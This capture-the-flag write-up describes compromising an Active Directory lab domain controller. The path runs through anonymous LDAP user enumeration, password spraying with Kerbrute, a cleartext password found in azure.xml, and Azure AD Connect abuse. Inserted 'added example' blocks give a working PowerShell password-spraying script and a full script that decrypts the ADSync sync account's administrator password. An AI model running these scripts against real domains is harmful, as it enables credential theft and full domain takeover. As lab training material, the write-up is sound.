Enumeration

Nmap

The Nmap scan showed services such as LDAP and Kerberos, which are characteristic of Active Directory, so the target is most likely a Domain Controller.

00 - nmap

SMB Shares

Initially, no SMB shares were accessible via a null session.

01 - No share is available

LDAP Anonymous

LDAP anonymous bind was enabled, which let me enumerate and dump every domain user for password guessing and further authentication testing.

02 - ldap anonymous is allowed

None of the enumerated users had Kerberos pre-authentication disabled, so AS-REP roasting was not possible.

03 - no asreproasting

Brute Force

To proceed, I generated a custom password list from the usernames themselves: a blank password, each username as its own password, and each username reversed (the n/s/r variants).

04 - created passList nsr

I then used Kerbrute with the generated list to identify valid username and password combinations against the KDC.

04 - kerbrute
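The two steps above, generating the n/s/r candidates and feeding them to Kerbrute, as an added example (this is not the write-up's own script or Kerbrute's code). It assumes a `users.txt` with one sAMAccountName per line from the anonymous LDAP dump, and the domain name and DC address are placeholders to replace.

```powershell
# Added example, not the write-up's own script: build username:password
# candidates in the n/s/r style (null password, same as login, reversed login)
# and test them with kerbrute's bruteforce mode, which takes user:pass lines.
# Assumptions (placeholders): users.txt from the LDAP dump, domain and DC below.
$Domain = 'example.local'
$Dc     = '10.10.10.10'

function New-NsrCombo {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [string] $User
    )
    process {
        $u = $User.Trim()
        if (-not $u) { return }          # skip blank lines in the dump
        $chars = $u.ToCharArray()
        [array]::Reverse($chars)
        $reversed = -join $chars
        # n: blank password, s: username as password, r: reversed username
        "${u}:"
        "${u}:${u}"
        "${u}:${reversed}"
    }
}

# Each output line is user:pass; kerbrute prints a hit as "VALID LOGIN".
Get-Content ./users.txt | New-NsrCombo | Set-Content ./combos.txt
./kerbrute bruteforce -d $Domain --dc $Dc ./combos.txt
```

This sends three guesses per account, so check the domain lockout threshold before running it against a list of every user; Kerberos pre-authentication failures count against the lockout counter just like LDAP or SMB failures.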

Exploitation

Although the user found by Kerbrute could not obtain a shell, the account had read access to some SMB shares, one of which contained an azure.xml file holding the cleartext password of the user mhope.

05 - smb readable

06 - available users

07 - azure xml

Using the credentials from the azure.xml file, I successfully obtained a shell as the user mhope.

08 - got the user

Privilege Escalation

To escalate privileges, I enumerated Active Directory with BloodHound, collecting the data with the bloodhound-python ingestor.

09 - bloodhound python

The BloodHound analysis revealed that the mhope user was a member of the Azure Admins group.

10 - sus group

At that point I was unsure how to proceed, so I researched privilege escalation techniques involving the Azure Admins group. That led me to the following blog post, https://blog.xpnsec.com/azuread-connect-for-redteam/, which explains how Azure AD Connect can be abused for privilege escalation.

The blog explains that the password of the Azure AD Connect sync account (on this machine, the domain administrator) is stored encrypted in the ADSync MSSQL database and can be decrypted on the host. I first checked whether I could run SQL queries against that database with sqlcmd as mhope, and confirmed that this was possible.

11 - some sqlcmd

The blog includes a script that reads keyset_id, instance_id and entropy from the mms_server_configuration table, and private_configuration_xml and encrypted_configuration from the mms_management_agent table. These values are then passed to the key manager in C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll, which decrypts the encrypted configuration containing the administrator password. However, the script's connection string targets a SQL Server LocalDB instance, which did not match this host, so I changed it to connect to the local SQL Server instance with Windows authentication, replacing this line:

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

to this:

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Database=ADSync;Trusted_Connection=True;"

For other SQL Server connection string formats, see https://www.connectionstrings.com/sql-server/
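The full procedure described above, with the local connection string applied, as an added example (this is not the write-up's own script and not the referenced post's script verbatim). It assumes the default mcrypt.dll install path, that the ADSync database is on the local default SQL Server instance and accepts Windows authentication from the current user (mhope, via Azure Admins), and that the on-premises connector row is selected by ma_type = 'AD'. The KeyManager method names are the ones the referenced post uses; check them against the post if your Azure AD Connect version differs.

```powershell
# Added example, not the original write-up's script: read the AD connector's
# encrypted configuration from the local ADSync database and decrypt it with
# the product's own mcrypt.dll, following the approach in the xpnsec post.
# Assumptions: default install path, local SQL Server instance, Windows auth,
# and the connector of interest has ma_type = 'AD'.

# Pre-check (what the write-up did with sqlcmd): make sure the database answers
# to integrated authentication before running the script.
#   sqlcmd -S localhost -d ADSync -Q "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"

$dll     = 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$connStr = 'Server=localhost;Database=ADSync;Trusted_Connection=True;'   # local instance, Windows auth

$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList $connStr
$client.Open()

# Identifiers the key manager needs to load the key set
$cmd = $client.CreateCommand()
$cmd.CommandText = 'SELECT keyset_id, instance_id, entropy FROM mms_server_configuration'
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$keyId      = $reader.GetInt32(0)
$instanceId = $reader.GetGuid(1)
$entropy    = $reader.GetGuid(2)
$reader.Close()

# The on-premises AD connector row: plaintext XML (domain, user) plus the
# encrypted configuration that holds the password
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config  = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
$client.Close()

# Decrypt with the product's own key manager (method names as used in the referenced post)
Add-Type -Path $dll
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instanceId, $keyId)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Pull the sync account's domain and user from the plaintext XML and the
# password from the decrypted XML
$domain   = (Select-Xml -Content $config    -XPath "//parameter[@name='forest-login-domain']").Node.InnerXml
$username = (Select-Xml -Content $config    -XPath "//parameter[@name='forest-login-user']").Node.InnerXml
$password = (Select-Xml -Content $decrypted -XPath "//attribute").Node.InnerText

"Domain:   $domain"
"Username: $username"
"Password: $password"
```

If the SqlConnection open fails, test the same connection string with sqlcmd first; the Trusted_Connection setting means the result depends entirely on which Windows account runs the script, which is why membership in Azure Admins matters here.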

12 - powershell

The script returned the decrypted administrator password, which I used to log in as Administrator.

13 - got the root

Pwned

The machine was fully compromised.

pwned
